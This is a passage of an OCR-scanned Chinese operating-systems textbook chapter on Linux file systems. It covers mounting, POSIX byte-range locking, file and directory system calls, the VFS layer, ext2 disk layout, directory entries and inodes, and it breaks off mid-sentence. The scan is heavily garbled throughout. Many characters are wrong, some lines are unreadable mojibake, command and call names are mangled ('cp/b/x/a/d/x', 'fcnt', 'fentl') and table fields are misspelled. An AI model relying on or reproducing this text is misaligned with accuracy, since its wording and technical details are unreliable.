当 一 台 机 器 上 安装 了 多 个 磁盘 的 时 候 ， 如 何 处 理 它们 就 是 一 个 问题 。 


一 个 解决 方法 是 在 每 一 个 磁盘 上 安装 上 自 包含 的 文件 系统 ， 使 它们 
之 间 互 相 独立 。 考 虑 如 图 10-25a 所 示 的 解决 方法 ， 有 一 个 硬 副 C: 和 一 个 
DVD D:， 它 们 都 有 自己 的 根 目 录 和 文件 。 如 果 使 用 这 种 解决 方法 ， 除 
了 默认 盘 外 ， 使 用 者 必须 指定 设备 和 文件 ， 例 如 ， 要 把 文件 x 复制 到 目 
录 d 中 (假设 C: 是 默认 强 ) ， 应 该 使 用 命令 


cp D:/x/a/d/x 


这 种 方法 被 许多 操作 系统 使 用 ， 包 括 MS-DOS、Windows 98 和 
VMS ° 


人 硬盘 


WO © 
b) 


a) 


Al 10-25 al) 分 离 的 文件 系统 ，b) 挂 载 之 后 


Linux 的 解决 方法 是 允许 一 个 磁 表 挂 载 到 另 一 个 做 一 的 目 永 树 上 ， 


比如 ， 我 们 可 以 把 DVD 挂 载 在 目录 /bb 上， 构成 如 网 10-25b 所 示 的 文件 系 
统 。 挂 载 之 后 ， 用 户 能 够 看 见 一 个 目录 树 ， 而 不 再 需要 关心 文件 在 哪 
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个 设备 上 ， 上 面 提 到 的 命令 就 可 以 变 成 


cp/b/x/a/d/x 


和 所 有 文件 都 在 硬盘 上 是 一 样 的 。 
Linux 文 件 系 统 的 另 一 个 有 趣 的 性 质 是 加 锁 (locking) 。 在 一 些 应 
用 中 会 出 现 两 个 或 更 多 的 进程 同时 使 用 同一 个 文件 的 情况 ， 可 能 导致 


竞争 条 件 (race condition) 。 有 一 种 解决 方法 是 使 用 临界 区 ， 但 是 如 果 
这 些 进程 属于 相互 不 认识 的 独立 的 用 户 ， 这 种 解决 方法 是 不 方便 的 。 


考虑 这 样 的 一 个 例子 ， 一 个 数据 库 组 织 许 多 文件 在 一 个 或 多 个 目 
好 中 ， 它 们 可 以 被 不 相关 的 用 户 访 问 。 可 以 通过 设置 信和 与 量 来 解决 互 
不 的 问题 ， 在 每 个 目录 或 文件 上 设置 一 个 信号 量 ， 当 程序 需要 访问 相 
应 的 数据 时 ， 在 相应 的 信号 量 上 做 一 个 down 操 作 。 但 这 样 做 的 缺点 
和 是， 尽管 进程 只 需要 访问 一 条 记录 却 使 得 整个 目录 或 文件 都 不 能 访 
[A] o 


由 于 这 种 原因 ，POSIX 提 供 了 一 种 灵活 的 、 细 粒度 的 机 制 ， 允 许 
一 个 进程 使 用 一 个 不 可 分 割 的 操作 对 小 到 一 个 字 节 、 大 到 整个 文件 加 
锁 。 加 锁 机 制 要 求 加 锁 者 标识 要 加 锁 的 文件 、 开 始 位 置 以 及 要 加 锁 的 
字 数 。 如 采 操 作成 功 ， 系 统 会 在 表格 中 添加 记录 说 明 要 求 加 锁 的 字 
《如 数据 库 的 一 条 记录 ) 已 被 锁 住 。 


系统 提供 了 两 种 锁 ， 共 享 锁 和 互 斥 锁 。 如 果 文 件 的 一 部 分 已 经 被 
加 了 共享 锁 ， 那 么 在 上 面 签 试 加 共享 锁 是 允许 的 ， 但 是 加 互 斥 锁 是 不 
会 成 功 的 ;如 果 文 件 的 一 部 分 已 经 被 加 了 互 斥 锁 ， 那 么 在 互 斤 锁 解 除 
之 前 加 任何 锁 都 不 会 成 功 。 为 了 成 功 地 加 锁 ， 请 求 加 锁 的 部 分 的 所 有 
FT eB i xe HHS ° 


在 加 锁 时 ， 进 程 必须 指出 当 加 锁 不 成 功 时 是 否 阻 蹇 。 如 果 选 择 阻 


加 锁 区 域 可 以 是 重 友 的。 如 图 10-26a 所 示 ， 进 程 A 在 第 4 字 节 到 第 7 

节 的 区 域 加 了 共享 锁 ， 之 后 ， 进 程 B 在 第 6 字 节 到 第 9 字 节 加 了 共享 
锁 ， 如 图 10-26b 所 示 ， 最 后 ， 进 程 C 在 第 2 字 市 到 第 11 字 节 加 了 共享 
锁 。 由 于 这 些 锁 都 是 共享 锁 ， 是 可 以 同时 存在 的 。 


进程 A 的 共享 锁 


A 的 共享 锁 


B 的 共享 锁 


C 的 共享 锁 


Al 10-26 a 加 了 一 个 锁 的 文件 ，b) 增 加 了 第 二 个 锁 ; Oo 增加 了 第 三 个 
et 


此 时 ， 如 果 一 个 进程 试图 在 图 10-26c 中 文件 的 第 9 个 字 节 加 互 不 
峰 ， 并 设置 加 锁 失 败 时 阻塞 ， 那 么 会 发 生 什么 ? 由 于 该 区 域 已 经 被 进 
程 B 和 进程 C 两 个 进程 加 锁 ， 这 个 进程 将 会 被 阻塞 ， 直 到 进程 B 和 进程 C 
释放 它们 的 锁 为 止 。 


10.6.2 ”Linux 的 文件 系统 调用 


许多 系统 调用 与 文件 和 文件 系统 有 关 。 在 本 节 中 ， 首 先 研究 对 单 
个 文件 进行 操作 的 系统 调用 ， 之 后 我 们 会 研究 针对 目录 和 文件 系统 的 
系统 调用 。 要 创建 一 个 文件 时 ， 可 以 使 用 creat 系 统 调 用 。 (曾经 有 人 
问 Ken Thompson， 如 果 给 他 一 次 重新 发 明 UNIX 的 机 会 ， 他 会 做 什么 不 
同事 情 ， 他 回答 说 他 要 把 这 个 系统 调用 的 拼写 改 成 create， 而 不 是 现在 
的 creat。) 这 个 系统 调用 的 参数 是 文件 名 和 保护 模式 。 于 是 


fd=creat("abc",mode); 


创建 了 一 个 名 为 abc 的 文件 ， 并 根据 mode 设 置 文件 的 保护 位 。 这 些 
保护 位 决定 了 用 户 访 问 文 件 的 权限 及 方式 。 在 下 文 将 会 具体 讨论 。 


creat 系 统 调 用 不 仅 创建 了 一 个 新 文件 ， 还 以 写 的 方式 打开 了 这 个 
文件 。 为 了 使 以 后 的 系统 调用 能 够 访问 这 个 文件 ，creat 成 功 时 返回 一 
个 非 负 整数 ， 这 个 非 负 整数 叫做 文件 搬 述 行 ， 也 束 是 例子 中 的 fd。 如 果 
creat 作 用 在 一 个 已 经 存在 的 文件 上 ， 那 么 该 文件 的 文件 长 度 会 被 截 短 
为 0， 它 的 内 容 会 被 丢 痉 。 通 过 设置 合适 的 参数 ，open 系 统 调用 也 能 创 
TENCE 


现在 我 们 继续 讨论 图 10-27 列 出 的 主要 的 文件 系统 调用 。 为 了 读 或 
写 一 个 已 经 存在 的 文件 ， 必 须 使 用 open 系 统 调用 打开 这 个 文件 。 它 的 
参数 是 要 打开 文件 的 文件 名 以 及 打开 方式 : 只 读 、 只 写 或 两 者 。 此 
外 ， 也 可 以 指定 不 同 的 选项 。 和 creat 一 样 ，open 返 回 一 个 文件 描述 
符 ， 可 用 来 进行 读 写 。 然 后 可 以 使 用 close 系 统 调用 来 关闭 文件 ， 它 使 
得 文件 描述 符 可 以 被 后 来 的 creat 或 open 使 用 。creat 和 open 系 统 调用 总 是 
返回 未 被 使 用 的 最 小 数值 的 文件 描述 符 。 


系统 调用 
fd = creat(name,mode) 
fd = open(file, how, -**) 

S = close(fd) 

n = read(fd, buffer, nbytes) 
[n = write(fd, buffer, nbytes) 
| position = lseek(fd, offset, whence) 
s = stat(name, &buf) 

s = fstat(fd, &buf) 

s = pipe(&fd[0]) 

s = fentl(fd, cmd,…) 


描述 
创建 新 文件 的 一 种 方法 
打开 文件 读 、 写 或 者 读 写 
关闭 一 个 已 经 打开 的 文件 
从 文件 中 读 取 数据 到 一 个 缓冲 区 
把 数据 从 缓冲 区 写 到 文件 
移动 文件 指针 

获取 一 个 文件 的 状态 信息 
获取 一 个 文件 的 状态 信息 
创建 一 个 管道 l 
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图 10-27 RNR EASA ° WREEK, IAR EÉs 
是 -1; fd 是 一 个 文件 描述 符 ，position 是 文件 偏 移 。 参 数 的 含义 是 很 清 


ZEN 


当 一 个 程序 以 标准 方式 运行 时 ， 文 件 描述 符 0、1、2 已 经 分 别 用 于 
标准 和 输入、 标准 输出 和 标准 铺 误 。 通 过 这 种 方式 ， 一 个 过 滤 右 ， 比 如 


sort 程 序 ， 可 以 从 文件 描述 符 0 读 取 输 入 ， 输 出 到 文件 描述 符 1， 而 不 需 
要 关心 这 些 文件 是 什么 。 这 种 机 制 能 够 有 效 是 因为 shell 在 程序 启动 之 
前 束 设 置 好 了 它们 的 值 。 


蝇 无 疑问 ， 最 币 使 用 的 文件 系统 调用 是 read 和 write。 写 们 每 个 都 有 
三 个 参数 : 文件 描述 符 (标明 要 读 写 的 文件 ) 、 缓 冲 区 地 址 (给 出 数 
据 存放 的 位 置 或 者 读 取 数 据 的 位 置 ) ， 长 度 (给 出 要 传输 的 数据 的 字 
TR) 。 这 些 就 是 全 部 了 。 这 种 设计 非常 简单 ， 一 个 典型 的 调用 方法 


=I 
JE: 


n=read(fd, buffer, nbytes); 


虽然 几乎 所 有 程序 都 是 顺序 读 写 文件 的 ， 但 是 一 些 程序 需要 能 够 
从 文件 的 任何 位 置 随机 地 读 写 文件 。 每 个 文件 都 有 一 个 指针 指 回 文件 
当前 的 读 写 位 置 。 当 顺序 地 读 写 文件 时 ， 这 个 指针 指向 将 要 读 写 的 字 
节 。 如 果 文 件 位 置 指针 最 初 指 向 4096， 在 读 取 了 1024 个 字 节 后 ， 它 会 
自动 地 指向 第 5120 个 字 节 。lseek 系 统 调用 可 以 改变 位 置 指 针 的 值 ， 所 
以 之 后 的 read 和 write 可 以 从 文件 的 任何 位 置 开始 读 写 ， 甚 至 是 超出 文件 
的 结尾 。 这 个 系统 调用 叫做 lseek， 古 为 了 避免 与 seek 冲 突 ， 其 中 后 首 以 
前 在 16 位 计算 机 上 用 于 查找 ， 现 在 已 经 不 使 用 了 。 


lseek 有 三 个 参数 : 第 一 个 是 文件 搬 述 符 ， 第 二 个 是 文件 读 写 位 


置 ， 第 三 个 表明 读 写 位 置 是 相对 于 文件 开头 、 当 前 位 置 还 是 文件 尾 。 


lseek 的 返回 值 是 当 读 写 位 置 改 变 后 的 绝对 位 置 。 有 点 讽刺 的 是 ，lseek 
古 惟 一 一 个 从 不 会 引起 实际 的 磁盘 寻 道 的 文件 系统 调用 ， 因 为 它 所 做 
的 只 是 修改 了 内 存 中 的 一 个 值 (文件 读 写 位 置 ) 。 


对 于 每 个 文件 ，Linux 记 录 了 它 的 文件 类 型 (普通 文件 、 目 录 、 特 
殊 文 件 ) 、 大 小 、 最 后 一 次 修改 时 间 和 其 他 信息 。 程序 可 以 使 用 stat 系 
统 调 用 来 查看 这 些 信息 ，stat 的 第 一 个 参数 是 文件 名 ， 第 二 个 参数 是 指 
癌 获取 的 文件 信息 将 要 存放 的 结构 的 指针 ， 该 结构 的 各 个 域 如 图 10-28 
所 示 。 系 统 调用 fstat 的 作用 和 stat 一 样 ， 惟 一 不 同 的 是 ，fstat 针 对 一 个 打 
开 的 文件 (文件 名 可 能 未 知 ) 进行 操作 ， 而 不 是 一 个 路 径 名 。 


存储 文件 的 设备 

i 节 点 号 〈 哪 个 文件 在 设备 上 ) 
文件 模式 〈 包 括 保护 信息 ) 
指向 文件 的 连接 数 
文件 所 有 者 的 标识 
文件 所 属 的 组 
文件 大 小 (单位 是 字 节 ) 
创建 时 间 


最 近 访问 的 时 间 
最 近 修改 的 时 间 


Al 10-28 ” stat 系统 调用 返回 的 域 


pipe 系 统 调 用 用 来 创建 一 个 shell 管 线 。 它 创建 了 一 种 伪 文 件 
(pseudo-file) ， 用 于 缓冲 管线 通信 的 数据 ， 并 给 缓冲 区 的 读 写 都 返回 
文件 接 述 符 。 以 下 面 的 管线 为 例 : 


sort <in|head-30 


在 执行 sort 的 进程 中 ， 文 件 描述 符 1 (标准 输出 ) 被 设置 为 写 入 管 
道 ， 执 行 head 的 进程 中 ， 文 件 描 述 符 0 (标准 输入 ) 被 设置 为 从 管道 读 
取 。 通 过 这 种 方式 ，sort 只 是 从 文件 描述 符 0 (被 设置 为 文件 in) 读 取 ， 
写 入 到 文件 描述 符 1 (ER) ， 甚 至 不 会 觉察 到 它们 已 经 被 重 定向 了 。 
如 采 它 们 没有 被 重 定 网 ，sort 将 会 目 动 从 键盘 读 取 数 据 ， 而 后 输出 到 显 
示 器 (默认 设备 ) 。 同 样 地 ， 当 head 从 文件 描述 符 0 中 读 取 数据 时 ， 它 
读 取 到 的 是 sort 写 入 到 管道 缓冲 区 中 的 数据 ，head 甚 至 不 知道 目 己 使 用 
了 管道 。 这 个 例子 清晰 地 表明 了 一 个 简单 的 概念 ( 重 定向 ) 和 一 个 简 
单 的 实现 《文件 描述 符 0 和 1) 如 何 实现 一 个 强大 的 工具 (以 任意 方式 
连接 程序 ， 而 不 需要 去 修改 它们 ) 。 


图 10-27 列 举 的 最 后 一 个 系统 调用 是 fcnt。fcnt 用 于 加 锁 和 解锁 文 
件 ， 应 用 共享 锁 和 互 不 锁 ， 或 者 是 执行 一 些 文件 相关 的 其 他 操作 。 


现在 我 们 开始 关注 与 目 如 及 文件 系统 整体 更 加 相关 ， 而 不 是 仪 和 
单个 文件 有 关 的 系统 调用 ， 图 10-29 列 举 了 一 些 这 样 的 系统 调用 。 可 以 


使 用 mkdir 和 rmdir 创 建 和 删除 目录 ， 但 需要 注意 ;只 有 目录 为 空 时 才 可 
以 将 其 删除 。 


系统 调用 fii 
| s=mkdir (path, mode) 建立 新 目录 
s=rmdir (path) 删除 目录 
s=link (oldpath, newpath) | 创建 指向 已 有 文件 的 链接 
s=unlink (path) 取消 文件 的 链接 - 
s=chdir (path) 改变 工作 目录 


打开 目录 | 


关闭 目录 | 
读 取 一 个 目录 项 

回转 目录 使 其 再 次 被 读 取 

图 10-29 与 目录 相关 的 一 些 系统 调用 。 如 末 发 生 和 错误， 那么 运 回 值 s 


是 -1，dir 是 一 个 目录 流 ，dirent 是 一 个 目录 项 。 参 数 的 信义 是 目 解释 的 


dir=opendir (path) 


s=closedir (dir) 
dirent=readdir (dir) 
rewinddir (dir) 


如 图 10-24 所 示 ， 创 建 一 个 指向 己 有 文件 的 链接 时 创建 了 一 个 目录 
项 (directory entry) 。 系 统 调用 link 用 于 创建 链接 ， 它 的 参数 是 已 有 文 
件 的 文件 名 和 链接 的 名 称 ， 使 用 unlink 可 以 删除 目录 项 。 当 文件 的 最 后 
一 个 链接 被 删除 时 ， 这 个 文件 会 被 目 动 删除 。 对 于 一 个 没有 被 链接 的 
文件 ， 对 其 使 用 unlink 也 会 让 它 从 目录 中 消失 。 


使 用 chdir 系 统 调用 可 以 改变 工作 目录 ， 工 作 目 录 的 改变 会 影响 到 
相对 路 径 名 的 解释 。 


10.6.3 Linux 文件 系统 的 实现 


在 本 下 中 ， 我 们 首先 研究 虚拟 文件 系统 (Virtual File System, 
VES) 层 文 持 的 抽象 。VFS 对 高 层 进 程 和 应 用 程序 隐藏 了 Linux 文 持 的 
所 有 文件 系统 之 间 的 区 别 ， 以 及 文件 系统 是 存储 在 本 地 设备 ， 还 是 需 
要 通过 网 络 访问 的 远程 设备 。 设 备 和 其 他 特殊 文件 也 可 以 通过 VFS 访 
问 。 接 下 来 ， 我 们 将 描述 第 一 个 被 Linux 广 泛 使 用 的 文件 系统 ext2 
(second extended file system) ° 随后， 我 们 将 讨论 ext3 文 件 系 统 中 所 
作 的 改进 。 所 有 的 Linux 都 能 处 理 有 多 个 磁盘 分 区 且 每 个 分 区 上 有 一 个 
不 同文 件 系 统 的 情况 。 


1.Linux 虚 拟 文件 系统 


为 了 使 应 用 程序 能 够 与 在 本 地 或 远程 设备 上 的 不 同文 件 系 统 进行 
交互 ，Linux 采 用 了 一 个 被 其 他 UNIX 系 统 使 用 的 方法 : 虚拟 文件 系 
统 。VFS 定 义 了 一 个 基本 的 文件 系统 抽象 以 及 这 些 抽象 上 人 允许 的 操作 集 
合 。 调 用 上 市 中 提 到 的 系统 调用 访 回 VFS 的 数据 结构 ， 人 确定 要 访问 的 文 
件 所 属 的 文件 系统 ， 然 后 通过 存储 在 VFS 数 据 结构 中 的 函数 指针 调用 该 
文件 系统 的 相应 操作 。 


图 10-30 总 结 了 VFS 文 持 的 四 个 主要 的 文件 系统 结构 。 其 中 ， 超 级 
块 包含 了 文件 系统 布局 的 重要 信息 ， 破 坏 了 超级 块 将 会 导致 文件 系统 


无 法 访问 。 每 个 i 节 点 (inode,index-node 的 简写 ， 但 是 从 来 不 这 样 称呼 
它 ， 而 一 些 人 省 略 了 “-” 并 称 之 为 1 节点) 表示 某 个 确切 的 文件 。 值 得 注 
意 的 是 在 Linux 中 ， 目 录 和 设备 也 当 作 有 是 文件 ， 所 以 它们 也 有 自己 对 应 
WITA o ERRAT 点 都 有 相应 的 结构 ， 由 文件 系统 所 在 的 物理 磁 玛 
维护 。 


a, BT AR 
特定 的 文件 d_compare,d_delete 
一 个 二 机关 RTX 


图 10-30 VFS 文 持 的 文件 系统 抽象 


Superblock | 特定 的 文件 系统 read_inode,sync_fs 


为 了 便于 目录 操作 及 路 径 (比如 /usr/ast/bin) WW, VESKA 
dentry 数 据 结构 ， 它 表示 一 个 日 隶 项 。 这 个 数据 结构 由 文件 系统 在 运行 
过 程 中 创建 。 目 隶 项 被 缓存 在 dentry_cache 中 ， 比 如 ，dentry_cache 会 包 
人 /，/msr，msrast 的 目 孙 项 。 如 果 多 个 进程 通过 同一 个 硬 连 接 ( 即 相 同 
路 径 ) 访问 同一 个 文件 ， 它 们 的 文件 对 象 都 会 指向 这 个 cache 中 的 同一 
个 目录 项 。 


file 数 据 结构 是 一 个 打开 文件 在 内 存 中 的 表示 ， 并 且 在 调用 open 系 
统 调用 时 被 创建 。 它 支持 read、write、sendfile、lock 等 上 一 节 中 提 到 的 
系统 调用 。 


在 VFS 下 层 实 现 的 实际 文件 系统 并 不 需要 在 内 部 使 用 与 VFS 完 全 相 
同 的 抽象 和 操作 ， 但 是 必须 实现 跟 VFS 对 象 所 指定 的 操作 在 语义 上 等 价 
的 文件 系统 操作 。 这 四 个 VFS 对 象 中 的 operations 数 据 结构 的 元 素 部 古 
指 癌 故 层 文 件 系 统 函 数 的 指针 。 


2.Linux ext2 文 件 系统 


接 下 来 ， 我 们 介绍 在 Linux 中 最 流行 的 磁盘 文件 系统 : ext2。 第 一 
个 Linux 操 作 系 统 使 用 MINIX 文 件 系 统 ， 但 是 它 限 制 了 文件 名 长 度 并 且 
文件 长 度 最 大 只 能 是 64MB。 后 来 MINIX 被 第 一 个 扩展 文件 系统 ，ext 文 
件 系统 取代 。ext 可 以 支持 长 文件 名 和 大 文件 ， 但 由 于 它 的 效率 问题 ， 
ext 被 ext2 代 替 ，ext2 在 今天 还 在 广泛 使 用 。 


ext2 的 磁盘 分 区 包含 了 一 个 如 图 10-31 所 示 的 文件 系统 。 块 0 不 被 
Linux 使 用 ， 而 通 负 用 来 存放 局 动 计算 机 的 代码 。 在 块 0 后 面 ， 磁 盘 分 
区 被 划分 为 大 干 个 块 组 ， 划 分 时 不 考虑 人 磁盘 的 物理 结构 。 每 个 块 组 的 
结构 如 下 : 


第 一 个 块 是 超级 块 ， 它 包含 了 该 文件 系统 的 信息 ， 包 括 i 市 点 的 个 
数 、 磁 盘 块 数 以 及 空闲 块 链表 的 起 始 位 置 (通常 有 几 百 个 项 ) 。 下 一 
个 是 组 描述 符 ， 存 放 了 位 图 (bitmap) 的 位 置 、 空 闪 块 数 、 组 中 的 i 节 
尽数 ， 以 及 组 中 目 隶 数 等 信息 ， 这 个 信息 很 重要 ， 因 为 ext2 试 图 把 目录 
均 习 地 分 散 存 储 到 磁盘 上 。 


超级 ， 块 位 | 数据 块 


块 图 


图 10-31 Linux ext2 文 件 系统 的 磁盘 布局 


两 个 位 图 分 别 记录 空 闪 块 和 空 闪 节点， 这 是 从 MINIX1 文 件 系 统 继 
承 的 〈 大 多 数 UNIX 文 件 系统 不 使 用 位 图 ， 而 使 用 空闲 列表 ) 。 每 一 个 
位 图 的 大 小 是 一 个 块 。 如 琳 一 个 块 大 小 古 1KB， 那 么 束 限 制 了 块 数 和 i 
节 扩 数 只 能 是 8192 个 。 块 数 古 一 个 闻 格 的 限制 ， 但 十 在 实际 应 用 中 ,i 
节 扩 数 并 不 是 。 


在 超级 块 之 后 是 i 太后 存储 区 域 ， 它们 被 编号 为 1 到 某 个 最 大 值 。 每 
个 ji 点 的 大 小 是 128 字 和 ， 并 且 每 一 个 诈 闷 恰好 描述 一 个 文件 。i 所 
包含 了 统计 信息 《包含 了 stat 系 统 调用 能 获得 的 所 有 信息 ， 实 际 上 stat 就 
是 从 i 节点 读 取 信息 的 )  ， 也 包含 了 所 有 存放 该 文件 数据 的 磁盘 块 的 位 
= 


在 iT 点 区 后 面 是 数据 块 区 ， 所 有 文件 和 目录 都 存放 在 这 个 区 域 。 
对 于 一 个 包含 了 一 个 以 上 和 磁盘 块 的 文件 和 目 示 ， 这 些 磁盘 块 是 不 需要 
连续 的 。 实 际 上 ， 一 个 大 文件 的 块 有 可 能 电 布 在 整个 磁盘 上 。 


HRI VAST BOA Ea a ERE Poo MUR RE NSH ZS IB], ext2 
把 普通 文件 组 织 到 与 父 目录 相同 的 块 组 上 ， 而 把 同一 个 块 上 的 数据 文 
件 组 织 成 初始 文件 市 后。 这 个 思想 来 目 Berkeley 的 快速 文件 系统 
(McKusick 等 人 ，1984) 。 位 图 用 于 快速 确定 在 什么 地 方 分 配 新 的 文 
件 系统 数据 。 在 分 配 新 的 文件 块 时 ，ext2 也 会 给 该 文件 预 分 配 许 多 (8 
个 ) 额外 的 数据 块 ， 这 样 可 以 减少 将 来 向 该 文件 写 入 数据 时 产生 的 文 
件 碎 片 。 这 种 策略 在 整个 磁盘 上 实现 了 文件 系统 负载 平衡 ， 而 且 由 于 
排列 和 缠 减 文件 碎片 ， 它 的 性 能 也 很 好 。 


要 访问 文件 ， 必 须 首 先 使 用 一 个 Linux 系 统 调用 ， 例 如 open， 该 调 
用 需要 文件 的 路 径 名 。 解 析 路 径 名 以 解析 出 单独 的 目录 。 如 果 使 用 相 
对 路 径 ， 则 从 当前 进程 的 当前 目 邓 开始 查找 ， 否 则 就 从 根 目录 开始 。 
在 以 上 两 种 情况 中 ， 第 一 个 目录 的 证 点 很 容易 定位 : 在 进程 描述 符 中 
有 指 同 它 的 指针 ;或 者 在 使 用 根 目 永 的 情况 下 ， 它 存储 在 磁盘 上 预定 
AYER EE ° 


目 永 文件 允许 不 超过 255 个 字符 的 文件 名 ， 如 网 10-32 所 示 。 每 一 个 
目 孙 都 由 整 效 个 磁盘 块 组 成 ， 这 样 目 孙 吏 可 以 整体 写 入 磁盘 。 在 一 个 
目录 中 ， 文 件 和 子 目 录 的 目录 项 古 未 排序 的 ， 并 且 一 个 紧 挨 着 一 个 。 
目 永 项 不 能 跨越 磁盘 块 ， 所 以 通常 在 每 个 磁盘 块 的 尾部 会 有 部 分 未 使 
FAURE e 


b) 


Al 10-32 a) 一 个 含有 三 个 文件 的 Linux 目 好 ; b) 文 件 voluminous 被 删 
除 后 的 目录 


图 10-32 中 的 每 个 目录 项 由 四 个 固定 长 度 的 域 和 一 个 可 变 长 度 的 域 
组 成 。 第 一 个 域 是 im 点 号 ， 文 件 colossal 的 让 点 号 是 19， 文 件 
voluminous 的 i 节 点 号 是 42， 目 录 bigdir 的 i 节 点 号 是 88。 接 下 来 是 rec_len 
域 ， 标 明 该 目录 项 的 大 小 (以 字 节 为 单位 ) ， 可 能 包括 名 字 后 面 的 一 
些 填 充 。 在 名 字 以 未 知 长 度 填充 时 ， 这 个 域 被 用 来 寻找 下 一 个 目录 
项 。 这 也 是 图 10-32 中 往 头 的 含义 。 接 下 来 古 类 型 域 . 文件 、 目 隶 等 。 
最 后 一 个 固定 域 是 文件 名 的 长 度 (以 字 市 为 单位 ， 在 例子 中 是 8、10 
和 6。 最 后 是 文件 名 ， 文 件 名 以 字 市 0 结束 ， 并 被 填充 到 32 字 市 边界 。 
额外 的 填充 可 以 在 此 之 后 。 


在 图 10-32b 中 ， 我 们 看 到 的 是 文件 voluminous 的 目 邓 项 个 移 除 后 同 
一 个 目录 的 内 容 。 这 是 通过 增加 colossal 的 域 的 长 度 ， 将 voluminous 以 
前 所 在 的 域 变 为 第 一 个 目录 项 的 填充 。 当 然 ， 这 个 填充 可 以 用 来 作为 
后 续 的 目录 项 。 


由 于 目录 是 按 线性 顺序 查找 的 ， 要 找到 一 个 位 于 大 目 邓 末尾 的 目 
杂项 会 耗费 相当 长 的 时 间 。 因 此 ， 系 统 为 近期 访问 过 的 目录 维护 一 个 
绥 存 。 该 缓存 使 用 文件 名 进行 查找 ， 如 来 命中 ， 那 么 就 可 以 避免 费时 
的 线性 查找 。 组 成 路 径 的 每 个 部 分 都 在 目录 绥 存 中 保存 一 个 dentry 对 
象 ， 并 且 通 过 它 的 i 节点 查找 到 后 续 的 路 径 元 素 的 目录 项 ， 直 到 找到 真 
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例如 ， 要 通过 绝对 路 径 名 来 查找 一 个 文件 (如: /usr/ast/file) ， 需 
要 经 过 如 下 步骤 。 首 爷 ， 系 统 定位 根 目 孙 ， 它 通常 使 用 2 号 i 点 (特别 
是 当 1 号 i 节点 被 用 来 处 理 磁盘 坏 块 的 了 时候) 。 系 统 在 目录 缓存 中 存放 一 
条 记录 以 便 将 来 对 根 目录 的 查找 。 然 后 ， 在 根 目 好 中 但 找 子 符 
串 “usr”"， 得 到 /usr 目 录 的 i 节点 号 。/usr 目 录 的 i 节点 号 同样 也 存 入 目录 组 
存 。 然 后 这 个 i 点 被 取出 ， 并 从 中 解析 出 磁盘 块 ， 这 样 束 可 读 取 /usr 目 
了 永 并 得 找 字符 串 “ast"。 一 且 找 到 这 个 目 孙 项 ， 目 孙 /usrast 的 说 aS 
可 以 从 中 获得 。 有 了 /usr/ast 的 i 方太 号 ， 束 可 以 读 取 i 太太 并 确定 目录 所 
在 的 磁盘 块 。 最 后 ， 从 /usrast 目 永 碍 找 “file" 并 确定 其 i7 氮 号 。 因 此 ， 


使 用 相对 地 址 不 仅 对 用 户 来 说 更 加 方便 ， 而 且 也 为 系统 节省 了 大 量 的 
工作 。 


如 果 文 件 存在 ， 那 么 系统 提取 其 i 节点 号 并 以 它 为 索引 在 i 放 反 表 

(在 磁盘 上 ) 中 定位 相应 的 节点 ， 并 小 入 内 存 。i 节 后 被 存放 在 i 节点 表 
中 ， 其 中 i 上 扩 表 是 一 个 内 核 数 据 结构 ， 用 于 保存 所 有 当前 打开 的 文件 
和 目录 的 i 节 点 。i 和 点 表 项 的 格式 至 少 要 包含 stat 系 统 调用 返回 的 所 有 
域 ， 以 保证 stat 正 常 运行 ( 见 图 10-28) 。 图 10-33 中 列 出 了 i 节点 结构 中 
由 Linux 文 件 系 统 层 文 持 的 一 些 域 。 实 际 的 节点 结 构 包 含 更 多 的 域 ， 这 
征 由 于 该 数据 结构 也 用 于 表示 目 永 、 设 备 以 及 其 他 特殊 文件 。i 记 点 结 
构 中 还 包含 了 一 些 为 将 来 的 应 用 保留 的 域 。 历 史 已 经 表明 未 使 用 的 位 
不 会 长 时 间 保持 这 种 方式 。 


| 域 | 字 节 数 描述 

Mode 2 文件 类 型 、 保 护 位 、 setuid 和 setgid 位 | 
Nlinks 2 “| 指向 该 i 节点 的 目录 项 的 数目 

Uid 2 | 文件 属 主 的 UID 

Gia | 2 | 文件 属 主 的 GID 
Sze | 4 | 文件 大 小 (以 字 节 为 单位 ) | 
Addr 12 个 磁盘 块 及 其 后 面 3 个 间接 块 的 地 址 

Gen | 1 generation 数 〈 每 次 i 节 点 被 重用 时 增加 ) | 
Atime 4 | 最 近 访 问 文件 的 时 间 | 
Mtime | 4 近 修改 文件 的 时 间 

[Cüme | 4 | 最 近 改 变 i 第 点 的 时 间 (除去 其 他 时 间 》 


图 10-33 ”Linux 的 i 节点 结构 中 的 一 些 域 


DERE BSAA ERO o TUR T read AZ FA ANF Ee BL 
的 一 个 典型 使 用 是 : 


n=read(fd, buffer, nbytes); 


当 内 核 得 到 控制 权时 ， 它 需要 从 这 三 个 参数 以 及 内 部 表 中 与 用 户 
有 关 的 信息 开始 。 内 部 表 中 的 项 目 之 一 是 文件 描述 符 数组 。 文 件 描 述 
符 数 组 用 文件 描述 符 作 为 索引 并 为 每 一 个 打开 的 文件 保存 一 个 表 项 
(最 多 达到 最 大 值 ， 通 常 默认 是 32 个 ) 。 


这 里 的 思想 是 从 一 个 文件 描述 符 开 始 ， 找 到 文件 对 应 的 让 点 为 
止 。 考 虑 一 个 可 能 的 设计 : 在 文件 质 述 符 表 中 存放 一 个 指 同 i 点 的 指 
针 。 尽 管 这 很 简单 ， 但 不 笠 的 是 这 个 方法 不 能 性 效 。 其 中 存在 的 问题 
征 : 与 每 个 文件 描述 符 相 关联 的 是 用 来 指明 下 一 次 读 〈 写 ) 从 哪个 字 
方 开 始 的 文件 堵 写 位 置 ， 它 该 放 在 什么 地 方 ? 一 个 可 能 的 方法 是 将 它 
放 到 iT 点 表 中 。 但 是 ， 当 两 个 或 两 个 以 上 不 相关 的 进程 同时 打开 同一 
个 文件 时 ， 由 于 每 个 进程 有 自己 的 文件 读 写 位 置 ， 这 个 方法 就 失效 
ye 
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样 ， 每 个 打开 文件 的 进程 都 有 自己 的 文件 读 写 位 置 。 不 笠 的 是 ， 这 个 
方法 也 是 失败 的 ， 但 是 其 原因 更 加 微妙 并 且 与 Linux 的 文件 共享 的 本 质 


有 关 。 考 虑 一 个 shell 脚 本 s， 它 由 顺序 执行 的 两 个 命令 p1 和 p2 组 成 。 如 
果 该 shell 脚 本 在 命令 行 


下 被 调用 ， 我 们 预期 p1 将 它 的 输出 写 到 x 中 ， 然 后 p2 也 将 输出 写 到 
x 中 ， 并 且 从 pl 结束 的 地 方 开始 。 


当 shell 生 成 p1 时 ，x 初 始 是 空 的 ， 从 而 p1 从 文件 位 置 0 开始 写 入 。 
然而 ， 当 p1 结 束 时 就 必须 通过 某 种 机 制 使 得 p2 看 到 的 初始 文件 位 置 不 
